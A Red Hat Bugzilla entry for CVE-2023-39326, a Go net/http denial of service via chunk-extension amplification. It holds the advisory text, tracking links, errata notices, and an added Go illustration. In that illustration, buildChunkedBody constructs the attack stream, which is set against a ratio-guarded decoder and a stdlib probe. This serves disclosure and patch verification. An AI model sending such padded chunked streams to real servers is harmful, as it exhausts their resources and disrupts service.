Bug 2253330 (CVE-2023-39326) - CVE-2023-39326 golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests
Summary: CVE-2023-39326 golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests
Keywords:
Status: NEW
Alias: CVE-2023-39326
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Sayan Biswas
QA Contact:
URL:
Whiteboard:
Depends On: 2253338 2253339 2253340 2253341 2253342 2253343 2253344 2253345 2253346 2253348 2255162 2255163 2255535 2293410 2293411 2253332 2253333 2253335 2253336 2253337 2253347
Blocks:
 
Reported: 2023-12-06 20:47 UTC by Patrick Del Bello
Modified: 2024-06-17 07:00 UTC (History)
CC List: 132 users

Fixed In Version: golang 1.20.12, golang 1.21.0-0, golang 1.21.5
Clone Of:
Environment:
Last Closed:
Embargoed:




Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHBA-2024:0931 0 None None None 2024-02-21 01:01:01 UTC
Red Hat Product Errata RHBA-2024:0932 0 None None None 2024-02-21 01:01:19 UTC
Red Hat Product Errata RHBA-2024:0933 0 None None None 2024-02-21 01:01:29 UTC
Red Hat Product Errata RHBA-2024:1009 0 None None None 2024-02-27 19:49:36 UTC
Red Hat Product Errata RHBA-2024:1010 0 None None None 2024-02-27 20:48:14 UTC
Red Hat Product Errata RHBA-2024:1011 0 None None None 2024-02-27 21:40:24 UTC
Red Hat Product Errata RHSA-2023:7198 0 None None None 2024-02-27 20:50:04 UTC
Red Hat Product Errata RHSA-2023:7200 0 None None None 2024-02-27 22:47:13 UTC
Red Hat Product Errata RHSA-2023:7201 0 None None None 2024-02-27 22:29:10 UTC
Red Hat Product Errata RHSA-2024:0269 0 None None None 2024-02-28 00:20:19 UTC
Red Hat Product Errata RHSA-2024:0281 0 None None None 2024-03-06 14:40:14 UTC
Red Hat Product Errata RHSA-2024:0530 0 None None None 2024-01-25 18:10:46 UTC
Red Hat Product Errata RHSA-2024:0694 0 None None None 2024-02-07 18:45:56 UTC
Red Hat Product Errata RHSA-2024:0695 0 None None None 2024-02-07 22:50:35 UTC
Red Hat Product Errata RHSA-2024:0728 0 None None None 2024-02-08 17:27:50 UTC
Red Hat Product Errata RHSA-2024:0748 0 None None None 2024-02-08 18:20:25 UTC
Red Hat Product Errata RHSA-2024:0843 0 None None None 2024-02-15 12:55:40 UTC
Red Hat Product Errata RHSA-2024:0880 0 None None None 2024-02-20 11:03:50 UTC
Red Hat Product Errata RHSA-2024:0887 0 None None None 2024-02-20 12:30:15 UTC
Red Hat Product Errata RHSA-2024:1041 0 None None None 2024-02-29 09:04:04 UTC
Red Hat Product Errata RHSA-2024:1078 0 None None None 2024-03-05 00:34:26 UTC
Red Hat Product Errata RHSA-2024:1131 0 None None None 2024-03-05 18:11:24 UTC
Red Hat Product Errata RHSA-2024:1149 0 None None None 2024-03-05 18:13:09 UTC
Red Hat Product Errata RHSA-2024:1244 0 None None None 2024-03-11 16:04:26 UTC
Red Hat Product Errata RHSA-2024:1434 0 None None None 2024-03-20 07:40:31 UTC
Red Hat Product Errata RHSA-2024:1640 0 None None None 2024-04-02 19:30:18 UTC
Red Hat Product Errata RHSA-2024:1812 0 None None None 2024-04-15 05:44:53 UTC
Red Hat Product Errata RHSA-2024:1859 0 None None None 2024-04-16 17:26:20 UTC
Red Hat Product Errata RHSA-2024:1896 0 None None None 2024-04-25 15:14:56 UTC
Red Hat Product Errata RHSA-2024:1901 0 None None None 2024-04-18 07:18:46 UTC
Red Hat Product Errata RHSA-2024:2160 0 None None None 2024-04-30 09:41:29 UTC
Red Hat Product Errata RHSA-2024:2193 0 None None None 2024-04-30 09:46:54 UTC
Red Hat Product Errata RHSA-2024:2245 0 None None None 2024-04-30 09:55:42 UTC
Red Hat Product Errata RHSA-2024:2272 0 None None None 2024-04-30 09:58:55 UTC

Description Patrick Del Bello 2023-12-06 20:47:22 UTC
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.

https://go.dev/cl/547335
https://go.dev/issue/64433
https://groups.google.com/g/golang-dev/c/6ypN5EjibjM/m/KmLVYH_uAgAJ
https://pkg.go.dev/vuln/GO-2023-2382
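
An added illustration of the amplification described in the comment above and of the body-to-wire ratio guard the fix introduced. This is example code written for this page, not code from this bug, from the Go project or from Red Hat. buildChunkedBody constructs the attacker's stream (one body byte per chunk, each chunk-size line padded with a large chunk extension); decodeChunked is a small stand-in decoder whose limits (maxLineLen, maxExcess, the 4-bytes-per-body-byte allowance) are assumptions modelled on the described fix, not copied from net/http; probeStdlib runs the same stream through the public net/http/httputil chunked reader of whatever toolchain compiles it, which is the code path net/http uses for request and response bodies, so it shows whether that toolchain stops early or reads the whole stream.

```go
package main

import (
	"bufio"
	"bytes"
	"errors"
	"fmt"
	"io"
	"net/http/httputil"
	"strconv"
	"strings"
)

// buildChunkedBody encodes body one byte per chunk. With extLen > 0 every
// chunk-size line carries a chunk extension (";" plus extLen filler bytes),
// the amplification pattern from the advisory: the receiver reads and
// discards roughly extLen network bytes for every body byte it delivers.
func buildChunkedBody(body []byte, extLen int) []byte {
	var buf bytes.Buffer
	ext := ""
	if extLen > 0 {
		ext = ";" + strings.Repeat("x", extLen)
	}
	for _, b := range body {
		buf.WriteString("1" + ext + "\r\n") // chunk-size "1" [;extension] CRLF
		buf.WriteByte(b)                    // one byte of chunk-data
		buf.WriteString("\r\n")
	}
	buf.WriteString("0\r\n\r\n") // last-chunk followed by an empty trailer
	return buf.Bytes()
}

// Assumed limits, modelled on the described fix rather than copied from it.
const (
	maxLineLen = 4096      // a chunk-size line longer than this is rejected
	maxExcess  = 16 * 1024 // non-data bytes tolerated beyond what body bytes pay for
)

var errTooMuchNonData = errors.New("chunked encoding contains too much non-data")

// decodeChunked is an illustrative chunked decoder with the ratio guard.
// A chunk of n body bytes pays for 4*(n+1) non-data bytes, so a
// one-byte-per-chunk sender (5 wire bytes per body byte) stays legal; unpaid
// bytes accumulate in excess, and once it passes maxExcess the decoder fails
// instead of silently discarding more input. It returns the body, the number
// of wire bytes processed before returning, and any error.
func decodeChunked(wire []byte) ([]byte, int, error) {
	r := bufio.NewReaderSize(bytes.NewReader(wire), maxLineLen)
	var body []byte
	consumed, excess := 0, int64(0)
	for {
		line, err := r.ReadSlice('\n')
		if errors.Is(err, bufio.ErrBufferFull) {
			return body, consumed, errors.New("chunk header line too long")
		} else if err != nil {
			return body, consumed, err
		}
		consumed += len(line)
		excess += int64(len(line)) + 2 // whole size line, plus the CRLF after chunk-data
		sizeText := strings.TrimRight(string(line), "\r\n")
		if i := strings.IndexByte(sizeText, ';'); i >= 0 {
			sizeText = sizeText[:i] // chunk extension: discarded, as net/http does
		}
		n, perr := strconv.ParseUint(sizeText, 16, 64)
		if perr != nil || n > uint64(len(wire)) {
			return body, consumed, fmt.Errorf("bad chunk size %q", sizeText)
		}
		excess -= 4 * (int64(n) + 1)
		if excess < 0 {
			excess = 0
		}
		if excess > maxExcess {
			return body, consumed, errTooMuchNonData
		}
		if n == 0 { // last-chunk: consume the trailer section through its blank line
			for {
				tl, terr := r.ReadSlice('\n')
				if terr != nil {
					return body, consumed, terr
				}
				consumed += len(tl)
				if strings.TrimRight(string(tl), "\r\n") == "" {
					return body, consumed, nil
				}
			}
		}
		chunk := make([]byte, n+2) // chunk-data plus its CRLF
		if _, rerr := io.ReadFull(r, chunk); rerr != nil {
			return body, consumed, rerr
		}
		consumed += len(chunk)
		if chunk[n] != '\r' || chunk[n+1] != '\n' {
			return body, consumed, errors.New("malformed chunk terminator")
		}
		body = append(body, chunk[:n]...)
	}
}

// probeStdlib runs wire through the public net/http chunked reader and reports
// how many body bytes it delivered and whether it stopped with an error.
func probeStdlib(wire []byte) (int, error) {
	body, err := io.ReadAll(httputil.NewChunkedReader(bytes.NewReader(wire)))
	return len(body), err
}

func main() {
	payload := bytes.Repeat([]byte("A"), 64) // constructed sample body
	for _, extLen := range []int{0, 4000} {   // 0: benign; 4000: chunk-extension flood
		wire := buildChunkedBody(payload, extLen)
		body, consumed, err := decodeChunked(wire)
		n, serr := probeStdlib(wire)
		fmt.Printf("extLen=%d wire=%d: decoded %d/%d bytes after %d wire bytes, err=%v; net/http delivered %d, err=%v\n",
			extLen, len(wire), len(body), len(payload), consumed, err, n, serr)
	}
}
```

With extLen=4000 each chunk costs about 4007 wire bytes per body byte, and the guard trips on the fifth chunk header after roughly 20 KiB of input; without the guard the same 64-byte body would force the receiver through about 256 KiB, and a sender can keep that up for as long as the connection stays open. On a toolchain from this bug's Fixed In Version or later, probeStdlib stops with an error after a few chunks; on an older one it reads the whole stream.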

Comment 1 Patrick Del Bello 2023-12-06 20:51:59 UTC
Created golang tracking bugs for this issue:

Affects: epel-all [bug 2253332]
Affects: fedora-all [bug 2253333]

Comment 9 Debarshi Ray 2024-01-15 22:46:54 UTC
We are missing the RHEL 9 tracking bug for toolbox, even though the bugs for RHEL 8 are there.

Comment 16 errata-xmlrpc 2024-01-25 18:10:38 UTC
This issue has been addressed in the following products:

  Cryostat 2 on RHEL 8

Via RHSA-2024:0530 https://access.redhat.com/errata/RHSA-2024:0530

Comment 20 errata-xmlrpc 2024-02-07 18:45:49 UTC
This issue has been addressed in the following products:

  RHOL-5.7-RHEL-8

Via RHSA-2024:0694 https://access.redhat.com/errata/RHSA-2024:0694

Comment 21 errata-xmlrpc 2024-02-07 22:50:27 UTC
This issue has been addressed in the following products:

  RHOL-5.6-RHEL-8

Via RHSA-2024:0695 https://access.redhat.com/errata/RHSA-2024:0695

Comment 22 errata-xmlrpc 2024-02-08 17:27:42 UTC
This issue has been addressed in the following products:

  RHOL-5.8-RHEL-9

Via RHSA-2024:0728 https://access.redhat.com/errata/RHSA-2024:0728

Comment 23 errata-xmlrpc 2024-02-08 18:20:18 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2024:0748 https://access.redhat.com/errata/RHSA-2024:0748

Comment 24 errata-xmlrpc 2024-02-15 12:55:33 UTC
This issue has been addressed in the following products:

  RHOSS-1.31-RHEL-8

Via RHSA-2024:0843 https://access.redhat.com/errata/RHSA-2024:0843

Comment 25 errata-xmlrpc 2024-02-20 11:03:42 UTC
This issue has been addressed in the following products:

  Openshift Serverless 1 on RHEL 8

Via RHSA-2024:0880 https://access.redhat.com/errata/RHSA-2024:0880

Comment 26 errata-xmlrpc 2024-02-20 12:30:07 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2024:0887 https://access.redhat.com/errata/RHSA-2024:0887

Comment 27 errata-xmlrpc 2024-02-27 20:49:56 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.15

Via RHSA-2023:7198 https://access.redhat.com/errata/RHSA-2023:7198

Comment 28 errata-xmlrpc 2024-02-27 22:29:02 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.15

Via RHSA-2023:7201 https://access.redhat.com/errata/RHSA-2023:7201

Comment 29 errata-xmlrpc 2024-02-27 22:47:06 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.15

Via RHSA-2023:7200 https://access.redhat.com/errata/RHSA-2023:7200

Comment 30 errata-xmlrpc 2024-02-28 00:20:13 UTC
This issue has been addressed in the following products:

  RODOO-1.1-RHEL-9

Via RHSA-2024:0269 https://access.redhat.com/errata/RHSA-2024:0269

Comment 32 errata-xmlrpc 2024-02-29 09:03:57 UTC
This issue has been addressed in the following products:

  Red Hat Developer Tools

Via RHSA-2024:1041 https://access.redhat.com/errata/RHSA-2024:1041

Comment 33 errata-xmlrpc 2024-03-05 00:34:19 UTC
This issue has been addressed in the following products:

  STF-1.5-RHEL-8

Via RHSA-2024:1078 https://access.redhat.com/errata/RHSA-2024:1078

Comment 34 errata-xmlrpc 2024-03-05 18:11:16 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:1131 https://access.redhat.com/errata/RHSA-2024:1131

Comment 35 errata-xmlrpc 2024-03-05 18:13:03 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:1149 https://access.redhat.com/errata/RHSA-2024:1149

Comment 36 errata-xmlrpc 2024-03-06 14:40:04 UTC
This issue has been addressed in the following products:

  OSSO-1.2-RHEL-9

Via RHSA-2024:0281 https://access.redhat.com/errata/RHSA-2024:0281

Comment 37 errata-xmlrpc 2024-03-11 16:04:19 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2024:1244 https://access.redhat.com/errata/RHSA-2024:1244

Comment 39 errata-xmlrpc 2024-03-20 07:40:24 UTC
This issue has been addressed in the following products:

  Red Hat Openshift distributed tracing 3.1

Via RHSA-2024:1434 https://access.redhat.com/errata/RHSA-2024:1434

Comment 40 errata-xmlrpc 2024-04-02 19:30:09 UTC
This issue has been addressed in the following products:

  Red Hat Ansible Automation Platform 2.4 for RHEL 9
  Red Hat Ansible Automation Platform 2.4 for RHEL 8

Via RHSA-2024:1640 https://access.redhat.com/errata/RHSA-2024:1640

Comment 41 errata-xmlrpc 2024-04-15 05:44:43 UTC
This issue has been addressed in the following products:

  OpenShift Custom Metrics Autoscaler 2

Via RHSA-2024:1812 https://access.redhat.com/errata/RHSA-2024:1812

Comment 42 errata-xmlrpc 2024-04-16 17:26:12 UTC
This issue has been addressed in the following products:

  OADP-1.3-RHEL-9

Via RHSA-2024:1859 https://access.redhat.com/errata/RHSA-2024:1859

Comment 43 errata-xmlrpc 2024-04-18 07:18:39 UTC
This issue has been addressed in the following products:

  Service Interconnect 1 for RHEL 9

Via RHSA-2024:1901 https://access.redhat.com/errata/RHSA-2024:1901

Comment 44 errata-xmlrpc 2024-04-25 15:14:47 UTC
This issue has been addressed in the following products:

  Red Hat OpenShift Container Platform 4.12

Via RHSA-2024:1896 https://access.redhat.com/errata/RHSA-2024:1896

Comment 45 errata-xmlrpc 2024-04-30 09:41:21 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2160 https://access.redhat.com/errata/RHSA-2024:2160

Comment 46 errata-xmlrpc 2024-04-30 09:46:47 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2193 https://access.redhat.com/errata/RHSA-2024:2193

Comment 47 errata-xmlrpc 2024-04-30 09:55:34 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2245 https://access.redhat.com/errata/RHSA-2024:2245

Comment 48 errata-xmlrpc 2024-04-30 09:58:45 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 9

Via RHSA-2024:2272 https://access.redhat.com/errata/RHSA-2024:2272

